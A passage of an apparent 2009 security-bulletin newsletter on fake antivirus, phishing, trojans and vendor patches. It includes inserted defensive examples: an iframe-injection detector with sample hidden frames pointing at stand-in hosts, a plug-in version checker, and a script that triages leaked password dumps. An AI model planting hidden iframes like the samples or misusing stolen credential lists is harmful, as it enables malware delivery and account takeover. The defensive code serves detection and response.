    On further investigation, Thompson found the referrals were coming from a Facebook application called "City Fire Department," a game where multiple players respond to emergency calls.

    The application had been modified to deliver an iframe, which is a way to bring content from one Web site into another.

    The iframe serves up code that tries to exploit vulnerabilities in a PC's software. If it finds one -- a process that happens nearly instantly -- it then downloads a fake antivirus program called Antivirus Pro 2010.
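Both the Gumblar forum injections described earlier and the modified Facebook application delivered their payload through an iframe the page owner never put there, typically sized to a pixel or styled out of view and pointing at another host. A site owner can look for such frames in their own pages. The following is an added example, not ScanSafe's or AVG's code; the page HTML and hostnames are constructed, and the check looks only at each iframe's own attributes, so it will not see a frame hidden by an ancestor's style or one written by script at run time.

```javascript
// Added example: find iframes that are hidden or point off-site in a page's
// HTML, the shape of the Gumblar and Facebook-app injections described
// above. Not ScanSafe's or AVG's code; the sample page and hostnames are
// constructed. Attribute-level only: frames hidden by an ancestor's style
// or created by script at run time are not seen.

const PAGE_HOST = "forum.example.org"; // assumed: the site being checked

const SAMPLE_PAGE = `
<html><body>
<h1>Forum post</h1>
<iframe src="/ads/banner.html" width="300" height="250"></iframe>
<iframe src="https://video.example.com/embed/abc" width="480" height="270"></iframe>
<iframe src="http://stats.example-cdn.net/counter.php" width="1" height="1" style="visibility:hidden"></iframe>
<iframe src="http://injected.example.net/in.php" style="position:absolute; left:-5000px"></iframe>
</body></html>
`;

// Parse the attributes of a single opening tag into a lowercase-keyed map.
function parseAttrs(tag) {
  const attrs = {};
  const re = /([a-zA-Z_:][-a-zA-Z0-9_:.]*)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g;
  let m;
  while ((m = re.exec(tag)) !== null) {
    attrs[m[1].toLowerCase()] = m[2] !== undefined ? m[2] : m[3] !== undefined ? m[3] : m[4];
  }
  return attrs;
}

// True when the frame's own attributes make it invisible: 0/1 pixel
// dimensions, display:none, visibility:hidden, or positioned far off-screen.
function isHidden(attrs) {
  const px = (v) => (v === undefined ? NaN : parseInt(v, 10));
  const w = px(attrs.width);
  const h = px(attrs.height);
  if ((!Number.isNaN(w) && w <= 1) || (!Number.isNaN(h) && h <= 1)) return true;
  const style = (attrs.style || "").toLowerCase().replace(/\s+/g, "");
  if (/display:none|visibility:hidden/.test(style)) return true;
  if (/(?:^|;)(?:width|height):[01](?:px)?(?:;|$)/.test(style)) return true;
  const off = /(?:^|;)(?:left|top):-(\d+)px/.exec(style);
  return off !== null && parseInt(off[1], 10) >= 1000;
}

// Returns one record per iframe with a src:
// { src, host, external, hidden, severity } where severity is
// "high" (hidden and off-site), "medium" (one of the two) or "info".
function findSuspiciousFrames(html, pageHost) {
  const results = [];
  const re = /<iframe\b[^>]*>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const attrs = parseAttrs(m[0]);
    if (!attrs.src) continue;
    let host = null;
    try {
      // Relative src values resolve against the page's own host.
      host = new URL(attrs.src, `http://${pageHost}/`).hostname.toLowerCase();
    } catch (e) {
      // unparseable src: leave host null, which counts as external
    }
    const external = host !== pageHost.toLowerCase();
    const hidden = isHidden(attrs);
    const severity = hidden && external ? "high" : hidden || external ? "medium" : "info";
    results.push({ src: attrs.src, host, external, hidden, severity });
  }
  return results;
}

// Stand-alone run: report the constructed page.
if (typeof require !== "undefined" && typeof module !== "undefined" && require.main === module) {
  console.table(findSuspiciousFrames(SAMPLE_PAGE, PAGE_HOST));
}
```

On the constructed page the site's own ad frame is rated "info", the visible video embed "medium" (off-site but not hidden), and the 1x1 hidden counter and the frame parked 5000 pixels off-screen both "high", which is the pattern to inspect first after a suspected compromise.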

    Thompson posted screenshots on AVG's blog.

    Bogus antivirus programs have been around for a long time, but they've become an increasing nuisance this year as those who create them seemed to have stepped up their game.

    When installed on computers, the programs nag users to buy them. The applications, which can cost upwards of US$60, are generally useless against real security threats.

    Thompson thought the people who wrote City Fire Department might be behind the scam. But the malicious code was actually hosted on Facebook, which led Thompson to theorize that the developers of City Fire Department inadvertently had their Facebook passwords obtained by a hacker, after which the application was modified.

    "The application has been taken offline until we can resolve all issues," according to the post. "We understand the frustration some users are feeling, and we will update with a timeline as soon as we can. Obviously, we would rather have a properly functioning game running instead of a half-working game."

    Three or four other applications had also been modified, Thompson said. Facebook can deactivate the applications until they are cleaned up. The situation also poses a danger to enterprises, which may allow their users access to Facebook through the firewall, thus opening a vector for delivering malware.

    If you have fallen for this scam, notify your service desk immediately and change your passwords.

    IDG News Service -By Jeremy Kirk

    Bugs & Fixes: Solving Safari cookie problems

    First off, the error message suggested that a cookie item named ac_history might be the proximate cause.

    I did find an ac_history cookie listed in Safari's Show Cookies window (shown below). So I removed it. The errors vanished immediately, without even having to quit Safari.

    So far, so good. But within a short time, usually less than an hour, the symptoms returned. As did the problematic ac_history cookie. Clearly, this was not a permanent fix.

    Next, I tried deleting all cookies. The result remained the same: a temporary fix at best.

    Here's where things began to get a bit weird. I decided to delete all cookies.

    But rather than do this via Safari, with which I was rapidly losing faith, I went to ~/Library/Cookies and removed the Cookies.plist file from the folder, placing it on my Desktop.

    Here's the final surprise: Suppose you have two different Cookies.plist files: an older one saved from some earlier troubleshooting and a new active one currently in the Cookies folder.

    Say the older one is stocked full of cookies and weighs in at 2.3MB, while the newer one is practically empty at only 4KB. This is exactly the situation that I had at one point in my troubleshooting of this matter.

    Now, still with Safari running, trash the 4KB file and drag the larger 2.3MB file to the Cookies folder. Within a second, the 2.3MB file drops to 4KB in size, as its data are replaced with those from the deleted file!

    Your 2.3 MB of cookie items are gone!

    It's easy to prevent this from happening. Just quit Safari before performing the swap. The next time you launch Safari, the replacement file will be active, with all its data intact.

    Still, it's a surprise that the vanishing act can happen at all.

    For more detailed instructions or to try this yourself, please see full article. -By Ted Landau

    Mozilla will let rival browsers run Firefox security tool

    Plans to open new plug-in checker to users running other browsers.

    Mozilla plans to let people running rivals' browsers use Firefox's new plug-in update service, company officials said today.

    After a week of testing, Mozilla late Tuesday launched a Web-based service that checks for outdated Firefox plug-ins.

    The service, which relies on a Web page users must steer to manually, is part of the company's effort to prod people into upgrading potentially-vulnerable add-ons, such as Adobe Flash Player, which have become a major target for attackers.

    The check scans for installed plug-ins, identifies those for which updates are available and provides a link to the vendor's download site.

    Although the service currently works only in Firefox, a pair of Mozilla managers said that the company wants to open the plug-in check to other browsers.

    "Right now, this page only works with Firefox, but we care about all of you and we're working to support those of you on other browsers as well," said Asa Dotzler , Mozilla's director of community development, in a post to his blog yesterday.

    In fact, the service already detects plug-ins when the page is accessed by some browsers, such as Apple's Safari, although it isn't able to tell which plug-ins are outdated.

    However, other browsers, including Microsoft's market-leading Internet Explorer (IE), can't use the page: When IE8 reaches the check-in page, the message "No plugins were detected" appears.

    The plug-in check service detects more than a dozen different plug-ins, but isn't always able to tell whether one is outdated.

    Adobe's plug-in to render PDF documents within the browser, for example, was detected on a Computerworld system running Windows XP, but the checker said it couldn't sniff out the version number.

    Mozilla kicked off its campaign to eradicate out-of-date plug-ins last month, when it shipped a Firefox update that included detection for only Adobe Flash Player.

    Later, Mozilla said that the Flash check had prompted more than 10 million users to go to Adobe's Web site to download the newest version of Flash.

    For a link to the plug in service, please see full article.

    Computerworld -By Computerworld Staff

    Bulletins posted 10/15/2009

    Keep Your Firefox Plugins Up to Date

    A fast and easy Mozilla site makes it a snap to make sure your browser's Plugins (not extensions) are current.

    Firefox extensions (a.k.a. add-ons) get updated from time to time.

    As you may know, you can check for updates yourself by clicking Tools, Add-ons, Updates, or just wait for the browser to notify you (which it does automatically from time to time).

    Ah, but what about Plugins, which make it possible to open PDFs right in your browser, view Adobe Flash and Microsoft Silverlight videos, update your Google applications, and the like? Firefox doesn't do automatic update checks for Plugins (yet--one must assume that's in the works), but thanks to a new Mozilla site, you can run a check yourself.

    It's called, aptly enough, Plugin Check, and using it is as simple as visiting the site. In just a few seconds you'll see the results for all your Plugins.

    Hopefully they're all green, meaning "up to date," but you may see some that are yellow, meaning an update is required.

    No worries: Just click the corresponding Update button to download and install it.

    If the checker can't determine a particular Plugin's status, you'll get a gray Research button you can click to run a Google search.

    That's not particularly handy, but at least you can find your way to the Plugin creator's Web site.

    I'd recommend visiting Plugin Check once a month or so, just to make sure you're not running any outdated Plugins.
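What a check like Plugin Check does on the client side is enumerate navigator.plugins, pull a version out of each plug-in's name or description string, and compare it with a table of current versions, answering green, yellow or gray as described above (gray being the case where no version can be read, as with the Acrobat plug-in in the Computerworld test). The following is an added example of that comparison, not Mozilla's code: the plug-in records and the minimum-version table are constructed for the illustration (the real service kept its version data server-side), and snapshotBrowserPlugins() only returns anything when run inside a browser.

```javascript
// Added example: the client-side half of a plug-in version check in the
// style of Mozilla's Plugin Check. Not Mozilla's code. The plug-in records
// below are constructed in the shape of navigator.plugins entries, and the
// minimum-version table is illustrative, not Mozilla's data.

const SAMPLE_PLUGINS = [
  { name: "Shockwave Flash", description: "Shockwave Flash 10.0 r22" },
  { name: "Silverlight Plug-In", description: "3.0.40818.0" },
  { name: "Adobe Acrobat", description: "Adobe PDF Plug-In For Firefox and Netscape" },
  { name: "Java(TM) Platform SE 6 U15", description: "Next Generation Java Plug-in 1.6.0_15 for Mozilla browsers" },
];

// Assumed minimum acceptable versions, keyed by a prefix of the plug-in name.
const MINIMUM_SAFE = {
  "Shockwave Flash": "10.0.32",
  "Silverlight Plug-In": "3.0.40818.0",
  "Adobe Acrobat": "9.2",
  "Java": "1.6.0.16",
};

// Pull a dotted version out of free text: "10.0 r22" -> [10, 0, 22],
// "1.6.0_15" -> [1, 6, 0, 15]. Returns null when no version is present,
// which is the gray "Research" case in Plugin Check.
function parseVersion(text) {
  const m = /(\d+(?:[._]\d+)+)(?:\s*r(\d+))?/.exec(text || "");
  if (!m) return null;
  const parts = m[1].split(/[._]/).map(Number);
  if (m[2] !== undefined) parts.push(Number(m[2]));
  return parts;
}

// Numeric component-wise comparison; missing trailing components count as 0,
// so "9.2" and "9.2.0.0" compare equal.
function compareVersions(a, b) {
  const n = Math.max(a.length, b.length);
  for (let i = 0; i < n; i++) {
    const x = a[i] || 0;
    const y = b[i] || 0;
    if (x !== y) return x < y ? -1 : 1;
  }
  return 0;
}

// Returns one row per plug-in: status is "up to date", "update required"
// or "unknown" (no parseable version, or no entry in the table).
function checkPlugins(plugins, minimums) {
  return plugins.map((p) => {
    const key = Object.keys(minimums).find((k) => p.name.startsWith(k));
    const installed = parseVersion(p.description) || parseVersion(p.version);
    if (!key || !installed) {
      return { name: p.name, installed: installed ? installed.join(".") : null, status: "unknown" };
    }
    const behind = compareVersions(installed, parseVersion(minimums[key])) < 0;
    return {
      name: p.name,
      installed: installed.join("."),
      required: minimums[key],
      status: behind ? "update required" : "up to date",
    };
  });
}

// In a browser this reads the live plug-in list; elsewhere it returns [].
function snapshotBrowserPlugins() {
  if (typeof navigator === "undefined" || !navigator.plugins) return [];
  return Array.from(navigator.plugins, (p) => ({ name: p.name, description: p.description, version: p.version }));
}

// Stand-alone run: check the live list if there is one, else the sample.
if (typeof require !== "undefined" && typeof module !== "undefined" && require.main === module) {
  const live = snapshotBrowserPlugins();
  console.table(checkPlugins(live.length ? live : SAMPLE_PLUGINS, MINIMUM_SAFE));
}
```

Against the constructed records, Flash 10.0 r22 and Java 1.6.0_15 come back "update required", Silverlight "up to date", and the Acrobat plug-in "unknown" because its description carries no version at all, the same outcome the article reports for the real checker.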

    For a link to "Plugin Check" please see full article.

    PC World -By Rick Broida

    Mozilla Delays Firefox 3.6 Beta

    Test build of the browser beta is available now, but the official beta won't arrive until next week.

    Instead of unleashing the Firefox 3.6 beta this week as planned, Mozilla released a "test build" of its browser to tantalize your taste buds for what's coming.

    An official release of the 3.6 beta is now set for October 21, one day before Windows 7 hits the streets -- possibly so users skip out on pre-installed Internet Explorer and go right for the good stuff.

    You can pick up your copy of the Firefox 3.6 beta test build on Mozilla's servers.

    Just select the operating system and processor platform you're using and grab the binary.

    Remember that this isn't even a beta -- it's a test build of a beta -- so expect bugs.

    For a list of improvements included in the new version please see full article. -By Brennon Slattery

    Firefox 3.6 Beta 'Test Build' Available For Download

    Beta version of Firefox 3.6 now available for download

    Mozilla today released the first beta of the next iteration of their Firefox browser, version 3.6.

    Word broke earlier last week with details that 3.6, codenamed Namoroka, would finally be leaving Alpha status, and being made available for download ahead of the full stable release, which is currently expected to appear sometime next month.

    However, despite 3.6's current availability, Mozilla's Patrick Finch has since clarified that the "beta programme for Firefox 3.6 has not yet launched", explaining that the version available on the company's servers is just a "test build".

    One such feature, although promised for version 3.6, which is lacking from this test build is the recently announced orientation detection.

    This new feature gives Firefox the power, when available, to detect the orientation of a device and change the position of the on-screen data.

    You can download the test build of the Firefox 3.6 Beta now, and according to some reports you may see an overall improvement in performance of up to 23%.

    To download the new version or for a list of improvements included, please see full article. -By Chris Brandrick

    Twitter Phishing Scam Spreading via Tweets and DMs

    From Mashable social media guide: It looks like a Twitter phishing scam that we reported on last month has re-emerged today.

    This morning, I was greeted by a direct message saying "you're on this vid" with a link.

    Still groggy, I clicked it, and quickly realized it was likely a phishing scam.

    And, it most definitely is, as Twitter search reveals lots of users spreading the same message presumably after logging in on the phishing site and others tweeting about receiving the same DM that I did.

    The site in question looks just like Twitter, but a quick look at the address bar reveals it clearly is not.

    If you have fallen for this scam, notify your service desk immediately and change your passwords. -by donna

    Bulletins posted 10/14/2009

    Bredolab Trojan surges to new heights

    Security administrators are being warned of a huge surge in incidents of the Bredolab Trojan, which could allow hackers to gain complete remote control of an organisation's PCs.

    Researchers at hosted security firm MessageLabs said that the Trojan, which is being sent out by the Cutwail botnet, has reached its highest ever levels, and now accounts for 3.5 per cent of all spam and 5.6 per cent of all malware intercepted each day.

    MessageLabs, which is now part of Symantec, said that so far in October around 3.6 billion Bredolab malware emails are likely to be in circulation globally each day.

    The Trojan is likely to appear in a zip file attachment to an unsolicited email with a subject line referring to postal tracking numbers, said the firm.

    The email prompts the recipient to open and run the attachment, which automatically installs the Trojan.

    "By nature, once this Trojan is on a system, it is unlikely to be detected and will allow the controller to do whatever they wish with the infected machine, such as installing other malware and spyware," said MessageLabs senior analyst Paul Wood.

    Watch out for any attachments you receive in your email. If you have fallen for this scam, notify your service desk immediately and change your passwords. -By Phil Muncaster

    Software Piracy Increasingly Leading To Malware Infection, Study Says

    More than 40 percent of software on PCs is pirated, Business Software Alliance reports.

    Some 41 percent of software on PCs is pirated, according to a study published last week by the Business Software Alliance (BSA).

    But pirated software isn't just illegal -- it could be dangerous to your machines, the BSA warns.

    Many users are downloading software illegally via peer-to-peer (P2P) networks and auction sites, according to the BSA report.

    But these download methods can lead to malware and identity theft, the report warns.

    The report draws correlations between Internet piracy and the spread of malware such as viruses, trojans, and spyware, which often exploit vulnerabilities in illegal -- and unpatched -- software.

    Although the correlation is not universal, geographies with high instances of software piracy also suffer from high instances of malware, the report says.

    "Pirated software can be a breeding ground for malware and can also open users up to crimes such as identity theft," says Jenny Blank senior director of legal affairs at the BSA.

    Beware of downloading software from an unlicensed source. If you have fallen for this scam, notify your service desk immediately and change your passwords.

    DarkReading -By Tim Wilson

    AVG upgrades free security tool to scan shortened URLs

    LinkScanner checks shortened URLs in real time and blocks users from visiting infected Web pages.

    AVG has added a feature to its LinkScanner Web security product that scans shortened URLs, which can often blindly lead users into a malicious software attack.

    LinkScanner, which AVG launched as a free product in April, performs real-time scanning of Web pages as users browse and blocks those pages that may have been rigged to exploit a software vulnerability.

    But the short URLs pose a particular danger since there's no way to tell in the browser window where the link leads.

    Twitter as well as other social networking sites have seen malicious shortened URLs proliferate.

    For more information or for a link to the free download, please see full article.

    NetworkWorld -By Jeremy Kirk

    MJ's New Song Leak Triggers Spam Attacks

    Michael Jackson's new song "This Is It" premiered online at midnight on October 12, where fans can listen to it for free.

    But apparently a 45-second preview of the song leaked onto YouTube the day before.

    The spam below has been making rounds to trick folks into accessing the link included in the email to listen to the preview

    (obviously it's not a real email from CNN, nor is the ad a real ad from GAP!).

    Once the user clicks on the link, the browser opens a page on a site that's believed to be compromised and is redirected to another site, which appears to be hacked as well, to execute a .hta file that is detected as Downloader.Psyme.

    Once the .hta file is executed, a file called AutoCfg.exe (detected as Backdoor.Trojan by Symantec) and legitimate files Servmess.dll, Autoexnt.exe, and Instexnt.exe are downloaded.

    These legitimate files are normally used for administrator purposes, but in this case the malware uses them to run after every reboot even if there is no one logged on the computer.

    At this point, the computer can be remotely controlled and all the information on it is in the hands of the criminals.

    To view a screen shot of this email, please see full article. If you have fallen for this scam, notify your service desk immediately and change your passwords.

    Symantec Connect -By Joji Hamada

    Twitter launches tool for nailing spammers

    Twitter added a tool that lets users flag accounts of spammers at the globally-popular microblogging service.

    Hitting a "Report as spam" button newly added to the Action section of Twitter pages alerts Twitter's safety team to check out what, if anything, should be done about a purportedly abusive profile.

    "Folks can now help us conquer spam by calling our attention to a profile they find questionable," Jenna Dawn of Twitter said in a blog post.

    For more information or to access the link about the "Report as spam" button please see full article. -By jennadawn

    Show Me the Malware!

    To help protect users against malware threats, Google has built automated scanners that detect malware on websites we've indexed.

    Pages that are identified as dangerous by these scanners are accompanied by warnings in Google search results, and browsers such as Google Chrome, Firefox, and Safari also use our data to show similar warnings to people attempting to visit suspicious sites.

    We're happy to announce that we've launched a feature that enables Google to provide even more detailed help to webmasters.

    Webmaster Tools now provides webmasters with samples of the malicious code that Google's automated scanners detected on their sites.

    These samples - which typically take the form of injected HTML tags, JavaScript, or embedded Flash files - are available in the "Malware details" Labs feature in Webmaster Tools.

    Registered webmasters (registration is free) of infected sites do not need to specially enable the feature - they will find links to it on the Webmaster Tools dashboard.

    Webmasters will see a list of their pages that we found to be involved in malware distribution and samples of the malicious content that Google's scanners encountered on each infected page.

    In certain situations we can identify the underlying cause of the malicious code, and we'll provide these details when possible.

    We hope that the additional information will assist webmasters and help prevent their visitors from being exposed to malware.

    For more information or to see screen shots of "Malware Details" please see full article.

    Google Blog -By Lucas Ballard

    Bulletins posted 10/13/2009

    Microsoft addresses critical SMBv2 flaw, fixes record number of flaws

    Microsoft issued 13 security bulletins Tuesday, eight of them critical, addressing zero-day flaws in Microsoft Server Message Block (SMB). Microsoft's regular update cycle fixed a record 34 vulnerabilities in Windows, Internet Explorer and Microsoft Office.

    Security experts warned that users should get the SMB and IIS patches implemented immediately because attackers have already had access to exploit code.

    In September, exploit code surfaced on several websites targeting vulnerabilities in both SMB and IIS, and Microsoft issued an advisory recommending that users deploy a workaround while its engineers produced and tested a fix.

    Josh Phillips, a virus researcher at Kaspersky Lab, called the SMB vulnerabilities the most alarming of the bulletins released Tuesday. In a statement, Phillips said the flaws were introduced as part of a Microsoft patch issued in 2007.

    In addition, the bulletins issued by Microsoft contained the first ever security update for the release-to-manufacturing version of Windows 7, addressing ActiveX control issues as a result of components built using a flawed version of Microsoft Active Template Library.

    For a full list of information of all the Microsoft updates please see full article. -By Robert Westervelt

    Adobe released a Security Bulletin updating Adobe Reader and Acrobat to v9.2 and v8.1.7. Support for the older 7.x versions ends on Dec. 28, 2009.

    Adobe released a new version of Adobe Reader and Acrobat to fix the security issue mentioned in their security bulletin today.

    Today a Security Bulletin has been posted in regards to the second quarterly security update for Adobe Reader and Acrobat.

    The update addresses critical security issues in the products; Adobe recommends that users apply the update for their product installations

    Please note that with support for Adobe Reader 7.X and Acrobat 7.X ending in December 2009, this is the last scheduled update planned for Adobe Reader 7.X and Acrobat 7.X.

    The Adobe Reader and Acrobat 9.2 and 8.1.7 updates will include a new update and deployment tool, initially shipping in a passive, beta state, which will be functional for Acrobat and Adobe Reader customers in the near future, as well as two new changes in security user interface and control.

    If you are using an older version of Adobe Reader or Acrobat update your computer before December 28, 2009. -By donna

    Bulletins posted 10/12/2009

    New versions of Adobe Reader, Acrobat to arrive Tuesday

    As part of its second-ever quarterly security update, Adobe on Tuesday plans to release new versions of Reader and Acrobat to address a number of flaws, including one that is being exploited in live attacks.

    Adobe is set to distribute updated versions of Reader and Acrobat 9.x and 8.x for Windows, Mac and UNIX, and of 7.x for Windows and Mac. The updates, timed to coincide with Microsoft's monthly patch release, will plug a number of vulnerabilities, including a critical bug present in version 9.1.3 that is being leveraged in targeted but limited in-the-wild attacks.

    Users can protect themselves from an exploit by enabling Data Execution Prevention (DEP), a Vista security feature that prevents an application from executing code in certain memory regions, or by disabling JavaScript, according to an Adobe bulletin released Thursday.

    The patches are being distributed four times a year, coincident with at least four of the same days that Microsoft pushes out its fixes.

    Be on the lookout for this update on October 13th. For more information please see full article. -By Dan Kaplan

    Microsoft readies bumper update

    Microsoft will issue its biggest ever security update on 13 October.

    The update will include 13 bulletins that between them tackle 34 vulnerabilities.

    Microsoft said that eight of the bulletins were rated as critical - the most serious sort of vulnerability.

    The security patches will close loopholes in many different programs including different editions of Windows, Internet Explorer and some elements of Office.

    Most people will get the updates automatically but links to download them can also be found on Microsoft's security pages. Once applied to a PC, the machine will need to be re-started before the fixes take effect.

    Microsoft typically issues its updates on the second Tuesday of every month. It started this regular monthly update system in late 2003.

    Be on the lookout for this update on October 13th. If you are using a Microsoft OS and the updates are not downloaded automatically, go to the Microsoft security page to start the update.

    Google patches Android DoS vulnerabilities

    Google has shipped a new version of the Android open-source mobile phone platform to fix a pair of security flaws that could lead to denial-of-service attacks.

    According to an advisory from oCERT, a group that handles vulnerability disclosure for open-source projects, the flaws could allow hackers to render Android-powered devices useless.

    "The phone application silently restarts without user awareness; this leads to a temporary loss of connectivity (as well as dropping of current calls, if any), which can be prolonged in case the phone SIM is protected by a PIN, due to the required PIN re-entry and the need for user attention.

    Triggering this bug (repeatedly in case no PIN is present) is considered a remote DoS condition."

    And the second bug:

    "A specific malicious application can be crafted so that if it is downloaded and executed by the user, it would trigger the vulnerable API function and restart the system process. The same condition could occur if a developer unintentionally places the vulnerable function in a place where the execution path leads to that function call. Triggering this bug is considered a DoS condition."

    The vulnerabilities affect Android 1.5. Patches have been released by Google. Download the patch as soon as possible. - By Ryan Naraine

    Bulletins posted 10/08/2009

    Yet Another Good National Cyber Security Awareness Month Resource - USA Today

    Still another great National Cyber Security Awareness Month resource, this one from USA Today: a website with education, stories and lots of links to more information.

    Another great site to check out and pass on to your friends and relations.

    USA Today Technology Cyber Security Education page.

    Bulletins posted 10/07/2009

    Another Good National Cyber Security Awareness Month Resource - Training

    As noted before, this month is National Cyber Security Awareness Month and I just found out about an excellent information security training that is free for the month of October.

    Take a look at this site and pass it on to your friends and relations (I've tested this link and the training; they are safe and well presented):

    SCIPP Security Awareness Training

    Tens Of Thousands Of Email Usernames And Passwords Posted Online By Phishers

    Hotmail, Gmail, Yahoo, and other email users' accounts exposed

    Lists containing tens of thousands of stolen email account usernames and passwords have shown up online during the past few days in what researchers say likely came out of multiple phishing attacks.

    Most of the accounts were from Microsoft's Hotmail, but Google's Gmail, Yahoo, Comcast, and Earthlink accounts also showed up on lists posted on a site typically used by developers to share code. Neowin reported yesterday that 10,000 or so Hotmail account details were posted online on October 1, and since then several other lists have been discovered that include email accounts from Gmail and the other providers.

    Microsoft and Google both confirmed some of the account information is legitimate, and that the information was likely stolen via phishing scams, not breaches of their mail systems. Just how those phishing scams were executed is unknown so far.

    We highly recommend that anyone with a Gmail, Hotmail, or Yahoo account change your passwords immediately. Since Gmail passwords can also give access to other Google applications, be sure to change those passwords as well. It is always safest if you change your online passwords on a regular basis just to avoid compromise from these types of scams.

    Dark Reading By Kelly Jackson Higgins
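As an added example (not from the Dark Reading article or this newsletter), here is how a security office can triage one of these lists when it comes into its hands: count accounts per provider, pick out the ones on domains it is responsible for so those users can be force-reset, and spot a password shared across several accounts, all without retaining or printing a plaintext password. The dump lines, the account names and the watched `example.gov` domain are constructed assumptions.

```python
from collections import Counter, defaultdict

# Constructed sample in the "address:password" form the leaked lists used.
# Every entry here is made up; none comes from the October 2009 dumps.
SAMPLE_DUMP = """\
alice.b@hotmail.com:Summer09!
bob.c@hotmail.com:password1
carol.d@gmail.com:Qwerty!23
dave.e@yahoo.com:letmein
erin.f@example.gov:CityHall2009
# junk line that should be ignored
frank.g@comcast.net:password1
alice.b@hotmail.com:Summer09!
gina.h@earthlink.net:gina1234
this line has no separator
"""

# Assumption: the domains this security office is responsible for.
WATCHED_DOMAINS = {"example.gov"}


def parse_dump(text):
    """Yield (address, password) pairs, skipping blanks, comments and malformed lines.
    Split on the first ':' only, because passwords may themselves contain colons."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or ":" not in line:
            continue
        addr, pwd = line.split(":", 1)
        addr = addr.strip().lower()
        if "@" not in addr or not pwd:
            continue
        yield addr, pwd


def triage(text, watched_domains=WATCHED_DOMAINS):
    """Summarise a dump: accounts per provider, the watched-domain accounts that appear,
    and groups of accounts sharing one password. Passwords are compared in memory and
    never returned, so the summary is safe to paste into a ticket."""
    seen = set()
    per_provider = Counter()
    watched = set()
    accounts_by_password = defaultdict(set)
    for addr, pwd in parse_dump(text):
        if addr in seen:            # the lists repeat entries; count each account once
            continue
        seen.add(addr)
        domain = addr.rsplit("@", 1)[1]
        per_provider[domain] += 1
        if domain in watched_domains:
            watched.add(addr)
        accounts_by_password[pwd].add(addr)
    reused = sorted(sorted(a) for a in accounts_by_password.values() if len(a) > 1)
    return {
        "accounts": len(seen),
        "per_provider": dict(per_provider),
        "watched": sorted(watched),
        "reused_passwords": reused,
    }


if __name__ == "__main__":
    report = triage(SAMPLE_DUMP)
    print(f"{report['accounts']} distinct accounts")
    for domain, n in sorted(report["per_provider"].items(), key=lambda kv: -kv[1]):
        print(f"  {domain:15} {n}")
    print("watched accounts to force-reset:", ", ".join(report["watched"]) or "none")
    print("accounts sharing a password:", report["reused_passwords"] or "none")
```

A password shared by accounts at different providers usually means one victim who reused it, which is exactly why the advice above is to change the password everywhere it was used, not only on the account that appeared in the list.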

    Philippines Floods Batter Search Engines with Fake AV

    The fake AV gang is now taking advantage of the recent disasters in the Philippines, which has been hit by Typhoon Ketsana (Ondoy) followed by Typhoon Parma (Pepeng), bringing serious flooding.

    Searching for the keywords philippines-flood-2009 on Google and Yahoo returns several top hits that link to fake alert messages warning that your computer needs to install antivirus software.

    Whatever you click on in these warnings, you are taken to a fake malware-scanning page that reports bogus infections and downloads an executable that is itself a trojan.

    You can expect any news item to generate scams of this kind, whether through poisoned search results like these, spam email, or pop-ups. If you land on one of these fake AV sites, close your browser immediately and do not run anything it downloaded.

    Authentium Virus Blog

    FBI Warns of three fake emails

    The FBI has released a bulletin outlining three fraudulent emails that have been circulating recently purporting to come from the FBI.

    The first, with the subject line "New DHS Report", has been circulating since August 15, 2009. The e-mails claim to come from the Department of Homeland Security (DHS) and the FBI Counterterrorism Division. The text refers to a "New Usama Bin Ladin Speech Directed to the People of Europe" and carries an attachment named audio.exe. The attachment is purportedly an audio recording of the speech; it actually contains malicious software intended to steal information from the recipient's system.

    The second, first seen around June 16, 2009, claims to contain a confidential report from the FBI Weapons of Mass Destruction Directorate. Its subject line is "RE: Weapons of Mass Destruction Directorate" and it carries an attachment named reports.exe. This message and others like it may carry the W32.Waledac trojan, which is designed to steal user authentication credentials or send spam.

    Finally, a fraudulent e-mail claiming to contain a confidential FBI report titled "New Patterns in Al-Qaeda Financing" has been circulating since August 15, 2009. Its subject line is "Intelligence Bulletin No. 267" and it carries an attachment named bulletin.exe. This message and others like it may contain files that harm the recipient's system and try to steal user credentials.

    Never click on links or open attachments in these emails; they are hoaxes and dangerous. The FBI does not send unsolicited e-mail or distribute official reports by e-mail. Do not respond to unsolicited e-mail or click on embedded links, as they may carry viruses or other malicious software.

    FBI - New E-scams and Warnings

    Bulletins posted 10/06/2009

    VMware Fusion update fixes two holes

    An update for VMware's Fusion software patches two vulnerabilities that could allow an attacker to take control of, or crash, a user's computer.

    Fusion lets VMware customers run Windows applications on Intel-based Macs. The flaws affect all versions of the software on Mac OS X up to and including 2.0.5.

    An attacker does not need administrative privileges to exploit these holes.

    VMware advised customers running the software on Mac OS X to download Fusion version 2.0.6 from VMware downloads. Customers may be entitled to a 12-month free subscription to McAfee VirusScan Plus 2009, depending on their version of Fusion. They should review their product release notes to verify whether they can get the free subscription, according to the advisory.

    ZDNet Asia - By Tom Espiner

    Scareware scams spill onto Skype

    Scareware spreaders have started to use Skype to spread their cash-sapping crud.

    The VoIP channel joins manipulated search results, malicious online advertisements, Facebook messages and iFrame-contaminated sites as a means of pushing rogue "anti-virus" scans.

    Sean-Paul Correll, a security researcher at Panda Security, explains that in its latest guise the scam arrives as spam messages sent to personal Skype accounts.

    The message poses as originating from an account called "Online Notification" and claims to have discovered infection on a supposedly compromised PC. Once the prospective mark visits the linked site for "more information", a fake antivirus scan takes place that warns a system is crawling with malware in a bid to coerce potentially alarmed users into buying a clean-up utility of no value.

    This scam is everywhere now - so be aware and don't fall for it.

    The Register By John Leyden

    Bulletins posted 10/05/2009

    October is National Cyber Security Awareness Month

    This month is National Cyber Security Awareness Month and I wanted to provide some links to some great information provided by the FBI to help you stay safe.

    Please take the time to read and pass along the following excellent documents (I know I always tell you not to click on links, but I've tested all of these and they are safe):

    TweetBot Spamming Ads And Other Junk

    What appears to be a botnet is using Twitter to spam advertising and other junk.

    In the past day or two, large numbers of accounts have been tweeting the identical message "File server blew up over the weekend. Over 1000 SQL backup job failures in the inbox this morning."

    Click through to the accounts tweeting this and you find other suspicious messages, such as "I recommend [removed] where you can compare the top 10 web hosting services. All include a free domain k" and "Do NOT Pay For White Teeth! Learn the trick discovered by a mom to turn yellow teeth white for $5. n"

    Not all of the messages contain links; that may simply be a bug in the bot.

    Be on the lookout for suspicious tweets like these and don't follow links indiscriminately.

    PC Magazine Blogs - Security Watch By Larry Seltzer
